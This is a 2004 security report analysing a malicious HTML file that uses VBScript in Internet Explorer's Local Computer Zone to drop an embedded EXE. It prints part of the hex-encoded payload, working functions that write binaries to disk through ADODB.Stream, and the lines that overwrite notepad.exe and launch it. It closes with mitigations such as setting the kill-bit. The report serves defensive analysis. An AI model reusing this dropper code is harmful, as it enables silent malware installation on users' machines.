Objectives About Us Sponsors News Past Events Contact Us
Login G-TEC CC Mirror Forums Links

 

 

SIG^2 Secure Code Study Report

HTML files in Local Computer Zone

by Tan Chew Keong
11 March 2004

Introduction

Users are normally aware of the risk associated with opening unknown EXE, COM, SCR or PIF files that might contain Trojan horses. However, users usually assume that HTML files will not cause any harm to their systems and are safe to open. In this report, we analyse a HTML file containing malicious VB script that extracts and executes a malicious EXE when opened in Local Computer Zone.

Analysis

The innocent looking HTML file contains a malicious EXE file embedded using a VB script array. This is shown below. 

<script language="vbscript">
Dim v(133)

v(0)="4D,5A,90,00,03,00,00,00,04,00,00,00,FF,FF,00,00,B8,00,00,00,00,00,00,00,40,00,00,00,00,00,00,00,00,00,00,00,00"
v(1)="00,00,00,00,00,00,00,00,00,00,08,01,00,00,0E,1F,BA,0E,00,B4,09,CD,21,B8,01,4C,CD,21,63,61,6E,6E,6F,74,20,62,65"
v(2)="20,72,75,6E,20,69,6E,20,44,4F,53,20,6D,6F,64,65,2E,0D,0D,0A,24,00,00,00,00,00,00,00,1B,57,DD,FC,07,5B,DD,86,1B"
v(3)="57,DD,94,13,0A,DD,85,1B,57,DD,04,13,0A,DD,85,1B,57,DD,04,07,59,DD,86,1B,57,DD,E8,04,DD,FE,3A,5C,DD,84,1B,57,DD"
v(4)="FE,3A,53,DD,84,1B,57,DD,87,1B,56,DD,F4,1B,57,DD,81,38,5C,DD,84,1B,57,DD,40,1D,51,DD,00,00,00,00,00,00,00,00,00"
v(5)="00,00,00,00,00,00,00,00,00,00,00,00,00,00,50,45,00,00,4C,01,03,00,04,B1,45,3F,00,00,00,00,10,00,00,00,10,00,00"
v(6)="00,50,00,00,40,69,00,00,00,60,00,00,00,70,00,00,00,00,40,00,00,10,00,00,00,02,00,00,00,00,00,00,80,00,00,00,10"
v(7)="00,00,00,00,00,00,02,00,00,00,00,00,10,00,00,10,00,00,00,00,10,00,00,10,00,00,00,00,00,A8,78,00,00,F8,00,00,00"
v(8)="00,70,00,00,A8,08,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00"

OTHER LINES REMOVED
 

Default installation of Internet Explorer allows the ADODB.Stream and ADODB.Recordset ActiveX controls to be instantiated in the Local Computer Zone without prompting the user. These two ActiveX controls are used by the malicious HTML file to write the embedded EXE file out to the local disk. The HTML file contains two VB functions, convToBinary and saveFile. The convToBinary function converts a VB string to a binary array object that can be used by the ADOBE.Stream ActiveX control. The saveFile function accepts a filename and a binary array object as input, and creates a binary ADOBE.Stream control to write the contains of the binary array object out to disk. These two functions are shown below.

 

Function convToBinary(inData)
  Dim rs, lenInData
 
  Set rs = CreateObject("ADODB.Recordset")
  lenInData = LenB(inData)
  
  If lenInData > 0 Then
    rs.Fields.Append "temp", 205, lenInData
    rs.Open
    rs.AddNew
    rs.Fields("temp").AppendChunk(inData)
    rs.Update
    convToBinary = RS("temp").GetChunk(lenInData)
  End If
  
End Function


Sub saveFile(FileName, ByteArray)
  Dim bs
  Set bs = CreateObject("ADODB.Stream")
  
  bs.Type = 1
  bs.Open
  bs.Write ByteArray
  
  bs.SaveToFile FileName, 2
End Sub
 

The code that was used to extract the EXE file and write it out to disk is shown below. Basically, this code processes the array containing the malicious EXE (v) by splitting up each of the individual hex values and then recombining them back into a byte string. This byte string is then passed to convToBinary to get a binary array object. This binary array is written to disk using the saveFile function. Note that notepad.exe in c:\windows\system32\ and c:\winnt\system32\ will be overwritten with the malicious EXE.

Lastly, the document.write statement uses the view-source protocol to invoke notepad.exe, which has already been overwitten with the malicious EXE.  

 

on error resume next
Dim y 
y = convToBinary(s)
saveFile "c:\windows\system32\notepad.exe", y
saveFile "c:\winnt\system32\notepad.exe", y
document.write("<img src=""view-source:file://c:/winnt/system32/SQLSRDME.TXT"" width=1 height=1>")

 

Mitigation

Users should be reminded to be vigilant even when opening innocent looking HTML files. They should also avoid using their systems as Adminstrator to prevent the overwriting of notepad.exe. In addition, the kill-bit should be set for the ADOBE.Stream ActiveX control to prevent any malicious HTML files from misusing it. Setting the kill-bit will prevent IE from activating the ActiveX control and will stop the above malicious HTML from running correctly.

The CLSID of this ActiveX control is {00000566-0000-0010-8000-00AA006D2EA4}.

Information for setting the kill-bit can be found at this link. Microsoft Knowledge Base Article - 240797

 

Conclusion

In this report, we see that opening a malicious HTML file in Local Computer Zone can be dangerous. Scripts within the HTML file can extract an embedded malicious EXE and execute it. Ways of mitigating this risk have been suggested above.

 

 

Contacts

For further enquries or to submit malicious code for our analysis, email them to the following.

Overall-in-charge: Tan Chew Keong


Updated: 11/3/2004
webmaster@security.org.sg